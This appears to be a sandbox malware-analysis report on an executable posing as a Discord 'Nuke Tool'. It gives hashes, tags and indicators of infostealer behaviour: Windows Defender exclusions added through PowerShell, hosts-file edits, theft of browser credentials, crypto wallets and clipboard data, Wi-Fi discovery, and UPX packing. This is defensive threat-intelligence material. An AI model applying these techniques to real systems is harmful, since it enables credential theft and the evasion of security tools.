eacbb5f16c8e1315bfa69d3bb0ce318cf246cff642bbde43e6263fd34e0c399b

Resubmissions

12-12-2024 15:34

241212-szwtpaykhv 10

12-12-2024 15:12

12-12-2024 03:03

11-12-2024 08:54

08-12-2024 15:39

Analysis

max time kernel
1020s
max time network
1024s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
12-12-2024 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nuke Tool discord-gg-kasyno.exe
Size

42.5MB
MD5

51817b9dcd9c193c3358f6b179d268d1
SHA1

48711e49dd33723c12a2ba925d228b99ab297274
SHA256

eacbb5f16c8e1315bfa69d3bb0ce318cf246cff642bbde43e6263fd34e0c399b
SHA512

6a5b1ac87137fe7ced1c902ee331d2eaf38a6d042b836190abd1a6a9f3826e1141c86ab64557992e7c388278f81f8abd04e60027e790cad8713c374f920f6957
SSDEEP

786432:gDEDi+G9pN2TxKFLyPnoVIXkXVGRG7dcuZaqdior4XXpf6q3loaU/fsc+KkeAhev:ggDi+RoFLyPno/AydcucZfb3KnqKUhev

Score

8^/10

collection credential_access defense_evasion discovery execution motw persistence phishing privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4492	powershell.exe
5100	powershell.exe
3900	powershell.exe
4196	powershell.exe
2832	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Nuke Tool discord-gg-kasyno.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

A potential corporate email address has been identified in the URL: water.css@2
phishing

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5040	cmd.exe
4240	powershell.exe

Executes dropped EXE 7 IoCs

pid	Process
1116	bound.exe
3848	bound.exe
3644	rar.exe
5444	HxDSetup.tmp
4848	HxD.exe
856	HxD.exe
5404	HxD.exe

Loads dropped DLL 30 IoCs

pid	Process
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3380	Nuke Tool discord-gg-kasyno.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe
3848	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
335	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
237	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2760	tasklist.exe
3564	tasklist.exe
3720	tasklist.exe
4052	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aac8-22.dat	upx
behavioral1/memory/3380-26-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp	upx
behavioral1/files/0x001a00000002aab5-28.dat	upx
behavioral1/files/0x001900000002aac6-30.dat	upx
behavioral1/memory/3380-33-0x00007FF8FD970000-0x00007FF8FD97F000-memory.dmp	upx
behavioral1/memory/3380-31-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp	upx
behavioral1/files/0x001900000002aabf-50.dat	upx
behavioral1/files/0x001900000002aabe-49.dat	upx
behavioral1/files/0x001900000002aabd-48.dat	upx
behavioral1/files/0x001900000002aabc-47.dat	upx
behavioral1/files/0x001900000002aabb-46.dat	upx
behavioral1/files/0x001900000002aaba-45.dat	upx
behavioral1/files/0x001900000002aab9-44.dat	upx
behavioral1/files/0x001e00000002aa91-43.dat	upx
behavioral1/files/0x001c00000002aad0-42.dat	upx
behavioral1/files/0x001900000002aacf-41.dat	upx
behavioral1/files/0x001900000002aacc-40.dat	upx
behavioral1/files/0x001900000002aac7-37.dat	upx
behavioral1/files/0x001900000002aac5-36.dat	upx
behavioral1/memory/3380-56-0x00007FF8F8120000-0x00007FF8F814C000-memory.dmp	upx
behavioral1/memory/3380-58-0x00007FF8FD950000-0x00007FF8FD968000-memory.dmp	upx
behavioral1/memory/3380-60-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp	upx
behavioral1/memory/3380-62-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp	upx
behavioral1/memory/3380-64-0x00007FF8F9970000-0x00007FF8F9989000-memory.dmp	upx
behavioral1/memory/3380-66-0x00007FF8FD600000-0x00007FF8FD60D000-memory.dmp	upx
behavioral1/memory/3380-68-0x00007FF8F7F90000-0x00007FF8F7FBE000-memory.dmp	upx
behavioral1/memory/3380-73-0x00007FF8F3A30000-0x00007FF8F3AE8000-memory.dmp	upx
behavioral1/memory/3380-76-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp	upx
behavioral1/memory/3380-75-0x00007FF8F36B0000-0x00007FF8F3A29000-memory.dmp	upx
behavioral1/memory/3380-80-0x00007FF8F7F60000-0x00007FF8F7F6D000-memory.dmp	upx
behavioral1/memory/3380-79-0x00007FF8F7F70000-0x00007FF8F7F85000-memory.dmp	upx
behavioral1/memory/3380-72-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp	upx
behavioral1/memory/3380-100-0x00007FF8DD9F0000-0x00007FF8DDB08000-memory.dmp	upx
behavioral1/memory/3380-141-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp	upx
behavioral1/memory/3380-249-0x00007FF8F9970000-0x00007FF8F9989000-memory.dmp	upx
behavioral1/memory/3380-225-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp	upx
behavioral1/memory/3380-268-0x00007FF8FD600000-0x00007FF8FD60D000-memory.dmp	upx
behavioral1/memory/3380-311-0x00007FF8F7F90000-0x00007FF8F7FBE000-memory.dmp	upx
behavioral1/memory/3380-313-0x00007FF8F3A30000-0x00007FF8F3AE8000-memory.dmp	upx
behavioral1/memory/3380-325-0x00007FF8F36B0000-0x00007FF8F3A29000-memory.dmp	upx
behavioral1/memory/3380-332-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp	upx
behavioral1/memory/3380-328-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp	upx
behavioral1/memory/3380-333-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp	upx
behavioral1/memory/3380-327-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp	upx
behavioral1/memory/3380-361-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp	upx
behavioral1/memory/3380-379-0x00007FF8F8120000-0x00007FF8F814C000-memory.dmp	upx
behavioral1/memory/3380-390-0x00007FF8DD9F0000-0x00007FF8DDB08000-memory.dmp	upx
behavioral1/memory/3380-398-0x00007FF8F3A30000-0x00007FF8F3AE8000-memory.dmp	upx
behavioral1/memory/3380-397-0x00007FF8F7F90000-0x00007FF8F7FBE000-memory.dmp	upx
behavioral1/memory/3380-396-0x00007FF8FD600000-0x00007FF8FD60D000-memory.dmp	upx
behavioral1/memory/3380-395-0x00007FF8F9970000-0x00007FF8F9989000-memory.dmp	upx
behavioral1/memory/3380-394-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp	upx
behavioral1/memory/3380-393-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp	upx
behavioral1/memory/3380-392-0x00007FF8FD950000-0x00007FF8FD968000-memory.dmp	upx
behavioral1/memory/3380-391-0x00007FF8F36B0000-0x00007FF8F3A29000-memory.dmp	upx
behavioral1/memory/3380-389-0x00007FF8F7F60000-0x00007FF8F7F6D000-memory.dmp	upx
behavioral1/memory/3380-388-0x00007FF8F7F70000-0x00007FF8F7F85000-memory.dmp	upx
behavioral1/memory/3380-378-0x00007FF8FD970000-0x00007FF8FD97F000-memory.dmp	upx
behavioral1/memory/3380-377-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp	upx
behavioral1/memory/3380-376-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp	upx

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files\HxD\unins000.dat	HxDSetup.tmp
File created	C:\Program Files\HxD\is-CV4BK.tmp	HxDSetup.tmp
File created	C:\Program Files\HxD\is-5I40Q.tmp	HxDSetup.tmp
File created	C:\Program Files\HxD\is-L9NDV.tmp	HxDSetup.tmp
File created	C:\Program Files\HxD\is-O6A01.tmp	HxDSetup.tmp
File created	C:\Program Files\HxD\is-HE6BL.tmp	HxDSetup.tmp
File opened for modification	C:\Program Files\HxD\unins000.dat	HxDSetup.tmp
File opened for modification	C:\Program Files\HxD\HxD.exe	HxDSetup.tmp

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001f00000002aa82-103.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HxDSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HxDSetup.tmp

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1940	netsh.exe
3244	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1596	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2292	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784919854729282"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000500000004000000020000000300000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "20"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202020202020202	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000500000004000000020000000300000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\SniffedFolderType = "Generic"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000000a343014af18db015c86ca41ac4cdb015c86ca41ac4cdb0114000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\MRUListEx = ffffffff	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\SniffedFolderType = "Generic"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000a343014af18db012eaf244bb418db014e6ae483ac4cdb0114000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000004000000020000000300000000000000ffffffff	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
